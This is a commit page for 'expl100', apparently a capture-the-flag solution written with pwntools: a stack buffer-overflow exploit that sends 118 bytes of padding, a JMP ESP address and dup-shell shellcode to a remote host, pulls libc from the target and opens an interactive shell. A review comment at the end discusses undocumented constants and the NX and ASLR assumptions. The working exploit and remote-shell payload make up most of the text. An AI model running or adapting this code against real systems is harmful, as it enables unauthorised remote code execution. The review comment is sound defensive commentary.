Cleanup expl100

q3k 2015-01-11 13:58:31 +01:00
parent 4f4af8e3d1
commit 14a3f0ed6a


@ -1,7 +1,5 @@
import pwn
import sys
from pwn import asm
import socket
shellcode = pwn.asm("""
mov eax, esp
@ -11,21 +9,12 @@ mov ebp, dword ptr [eax+6]
""" + pwn.shellcraft.i386.linux.dupsh('ebp'))
assert "\x00" not in shellcode
assert len(shellcode) <= 118
JMP_ESP = 0x080488b0
s = pwn.remote('54.163.248.69', 9000)
s.send('echo ' + 'a' * 118 + pwn.p32(JMP_ESP) + shellcode + '\n')
print s.recv(1024)
#s.interactive()
s.send("cat /lib/i386-linux-gnu/libc.so.6\n\n")
f = open('libc.so', 'w')
while True:
d = s.recv(1024)
if len(d) == 0:
break
f.write(d)
f.flush()
sys.stdout.write('.')
sys.stdout.flush()
s.interactive()
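Review bot: The two literals the script depends on are undocumented: `118` appears in both `assert len(shellcode) <= 118` and `'a' * 118`, and `JMP_ESP = 0x080488b0` has no note saying which build of the challenge binary it was taken from, so a reader cannot tell when either goes stale. I would name the length once, e.g. `PAD_LEN = 118  # padding length for the challenge binary (confirm against the build used)`, and use it in both places. The shellcode is sent after the padding rather than inside it, so the reason the assert bounds it by the same number should also be stated or the bound dropped. A comment above `JMP_ESP` should record the assumptions the script appears to rely on, presumably a fixed load address (non-PIE) and an executable stack, since those are exactly the mitigations (PIE/ASLR, NX) that would invalidate it. The +/- markers are lost on this page, so I am assuming these lines are on the new side.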